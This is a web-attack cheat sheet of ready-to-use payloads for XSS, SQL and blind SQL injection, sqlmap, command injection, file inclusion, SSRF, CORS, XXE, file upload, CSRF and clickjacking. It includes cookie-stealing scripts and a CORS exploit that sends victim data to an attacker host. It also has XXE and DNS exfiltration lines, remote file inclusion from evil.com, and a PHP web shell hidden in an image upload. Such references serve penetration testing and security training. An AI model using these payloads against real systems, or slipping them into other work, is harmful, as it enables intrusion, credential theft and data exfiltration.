Web Attacks

Cross-Site Scripting

• Test every entry point (URL path, GET parameters, POST parameters, User-Agent, Cookies).

• Submit random alphanumeric values (42424242).

• Determine the reflection context:

  • HTML content

    • original code: <p> hello 42424242 </p>

    • payload: <img src=x onerror=alert(1)>

    • malicious code: <p> hello <img src=x onerror=alert(1)> </p>

  • Tag attribute

    • original code: <input name="test" value="42424242">

    • payload: "> <img src=x onerror=alert(1)>

    • malicious code: <input name="test" value=""> <img src=x onerror=alert(1)> ">

  • Existing JS code

    • original code: <script> user="42424242"; </scirpt>

    • payload: "; alert(1); /*

    • malicious code: <script> user=""; alert(1); /* "; </script>

• Test a candidate payload for example <img src=x onerror=alert(1)>

• Test alternative payloads to bypass the filters (Cheat sheet).

• Test the attack in the browser.

# XSS Payloads
<img/src=`` onerror=this.onerror=confirm(1)
<svg/onload=eval(atob(`YWxlcnQoJ1hTUycp`))>
\<img src='data:'onerror=alert(0)

# Exploitation
document.location="http://127.0.0.1/"+document.cookie;
new Image().src="http://127.0.0.1/report?key="+document.cookie;

SQL Injection

# Finding columns numbers
' ORDER BY 4 #

# Finding which columns is vulnerable
' UNION SELECT 1,2,3 #

# Finding the database name
' UNION SELECT version(), database(), user() #

# Finding tables names through guessing
' UNION SELECT 1,2,3 FROM users #
' UNION SELECT 1,2,3 FROM posts #
' UNION SELECT 1,2,3 FROM accounts #

# Finding columns names through guessing
' UNION SELECT user,2,3 FROM users #
' UNION SELECT username,2,3 FROM users #
' UNION SELECT password,2,3 FROM users #

# Find tables and columns names through Information_Schema
' UNION SELECT table_name,2,3 FROM information_schema.tables #
' UNION SELECT column_name,2,3 FROM information_schema.columns where table_name="users" #

# If only just one column is vulnerable
' UNION SELECT concat(user,char(58),password),2 FROM users #

Blind SQL Injection

# Boolean Based
1' and 1=1 #
1' and 1=2 #

1' and ascii(substring(database(),1,1))>98 #
1' and ascii(substring(database(),1,1))=53 #

1' and (select 1 from users limit 0,1)=1 #
1' and (select 1 from posts limit 0,1)=1 #

1' and (select substring(concat(1,user),1,1) from users limit 0,1)=1 #
1' and (select substring(concat(1,password),1,1) from users limit 0,1)=1 #

1' and ascii(substring((SELECT concat(user,char(58),password) from users limit 0,1),1,1))>80 #
1' and ascii(substring((SELECT concat(user,char(58),password) from users limit 0,1),1,1))=80 #

1' and ascii(substring((SELECT concat(user,char(58),password) from users limit 0,1),2,1))>90 #
1' and ascii(substring((SELECT concat(user,char(58),password) from users limit 0,1),2,1))=90 #

# Time Based
1' - sleep(3) #
1' and if(1=1, sleep(10), false) #

1' and if(ascii(substring(version(),1,1))>53,sleep(3),0) #
1' and if(ascii(substring(version(),1,1))=53,sleep(3),0) #

1' and if(ascii(substring((SELECT concat(user,char(58),password) from users limit 0,1),1,1))=97,sleep(10),0) #
1' and if(ascii(substring((SELECT concat(user,char(58),password) from users limit 0,1),2,1))=81,sleep(10),0) #

For all types of SQL databases see: SQL injection cheat sheet

SQLMAP

# Get Help
sqlmap -h | sqlmap -hh

# GET parameters
sqlmap -u "URL"
sqlmap -u "URL" --cookie="COOKIE"
sqlmap -u "URL" --cookie="COOKIE" --dbs
sqlmap -u "URL" --cookie="COOKIE" -D dvwa --tables
sqlmap -u "URL" --cookie="COOKIE" -D dvwa -T users --dump

# POST parameters
sqlmap -u "URL" --cookie="COOKIE" --forms
sqlmap -u "URL" --cookie="COOKIE" --forms --dbs
sqlmap -u "URL" --cookie="COOKIE" --forms -D dvwa --tables
sqlmap -u "URL" --cookie="COOKIE" --forms -D dvwa -T users --dump

Command Injection

# Bypass Characters
& , && , | , || , > , < , ;

# Normal Injection
127.0.0.1 ; whoami
127.0.0.1 & whoami
127.0.0.1 && whoami
127.0.0.1 | whoami
notfoundip || whoami

# Blind Injection
127.0.0.1 ; ping -c 10 127.0.0.1 #
127.0.0.1 & whoami > /var/www/html/whoami.txt #
127.0.0.1 & nslookup kgji2ohoyw.web-attacker.com #
127.0.0.1 & nslookup `whoami`.kgji2ohoyw.web-attacker.com #

File Inclusion

filename=../../../../../../../../../etc/passwd
filename=..\..\..\..\..\..\..\..\..\windows\win.ini
filename=http://evil.com/shell.txt

# Bypass Techniques
filename=/etc/passwd
filename=....//....//....//....//....//....//etc/passwd
filename=../../../../../../etc/passwd%00.png
filename=http://evil.com/shell.txt%00
filename=HTTP://evil.com/shell.txt
filename=php://filter/resource=/etc/passwd
filename=php://filter/convert.base64-encode/resource=/etc/passwd

Open Redirection & SSRF

url=http://localhost
url=http://127.0.0.1:443
url=http://bing.com
url=http://www.company.com.evil.com
url=http://www.compant.com@evil.com
url=//google.com
url=https:google.com
url=file:///etc/passwd

Cross-Origin Resource Sharing

# Exploit CORS
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://vulnerable-website.com/sensitive-victim-data',true);
req.withCredentials = true;
req.send();

function reqListener() {
location='http://malicious-website.com/log?key='+this.responseText;
};

# Whitelisting Null origin
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html,
<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://vulnerable-website.com/sensitive-victim-data',true);
req.withCredentials = true;
req.send();

function reqListener() {
location='http://malicious-website.com/log?key='+this.responseText;
};
</script> "></iframe>

XML External Entity Injection

# Normal XXE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>

# Blind XXE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.vulnerable-website.com/"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>

# Parameter XXE
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com"> %xxe; ]>

# Malicious DTD
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://web-attacker.com/malicious.dtd"> %xxe;]>

# DTD Example
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
%eval;
%exfiltrate;

File Upload

# php one line code
echo "GIF87a" > rce.php
echo "<?php system($_GET['cmd']); ?>" >> rce.php

# PHP Extensions
.php
.php3
.pht
.phtml

# Double Extensions
.jpeg.php
.jpg.php
.png.php

# Change Content Type
Content-Type : image/gif
Content-Type : image/png
Content-Type : image/jpeg

# Null Byte
rce.phpD.pdf -> replace 'D' with 00 in burpsuite hex -> rce.php

# Image Bypass
exiftool -Comment='<?php system($_GET['cmd']); ?>' shot.jpg
mv shot.jpg shot.jpg.php

CSRF

# GET Request without Interaction
<img src="http://www.example.com/api/setusername?username=CSRFd">

# Post Request without Interaction
<form id="autosubmit" action="http://www.example.com/api/setusername" method="POST">
 <input name="username" type="hidden" value="CSRFd" />
 <input type="submit" value="Submit Request" />
</form>
 
<script>
 document.getElementById("autosubmit").submit();
</script>

Click-Jacking

<style>
   iframe {
       position: relative;
       width: 500px;
       height: 700px;
       opacity: 0.5;
       z-index: 2;
   }
   button {
       position: absolute;
       top: 300px;
       left: 60px;
       z-index: 1;
   }
</style>

<button type="button">Click Me!</button>

<iframe src="https://vulnerable-website.net/account"></iframe>

Authentication & Session Vulnerabilities

1. Testing for Credentials Transported over an Encrypted Channel

2. Testing for Default Credentials

3. Testing for Weak Lock Out Mechanism

4. Testing for Bypassing Authentication Schema

5. Testing for Vulnerable Remember Password

6. Testing for Browser Cache Weaknesses

7. Testing for Weak Password Policy

8. Testing for Weak Security Question Answer

9. Testing for Weak Password Change or Reset Functionalities

10. Testing for Weaker Authentication in Alternative Channel

11. Testing for Session ID Predictability and Randomness

12. Testing for Secure Cookies Attributes

13. Testing for Exposed Session Variables

Access Control Vulnerabilities

Vertical privilege escalation

If a user can gain access to functionality that they are not permitted to access then this is vertical privilege escalation. For example, if a non-administrative user can in fact gain access to an admin page where they can delete user accounts, then this is vertical privilege escalation.

# URL Based
https://insecure-website.com/admin

# Parameter Based
https://insecure-website.com/login/home.jsp?admin=true
https://insecure-website.com/login/home.jsp?role=1

Horizontal privilege escalation (IDOR)

Horizontal privilege escalation arises when a user is able to gain access to resources belonging to another user, instead of their own resources of that type. For example, if an employee should only be able to access their own employment and payroll records, but can in fact also access the records of other employees, then this is horizontal privilege escalation.

https://insecure-website.com/myaccount?id=123 // access data of user one
https://insecure-website.com/myaccount?id=124 // access data of user two

https://insecure-website.com/customer_account?customer_number=132355 //john's data
https://insecure-website.com/customer_account?customer_number=132356 //wick's data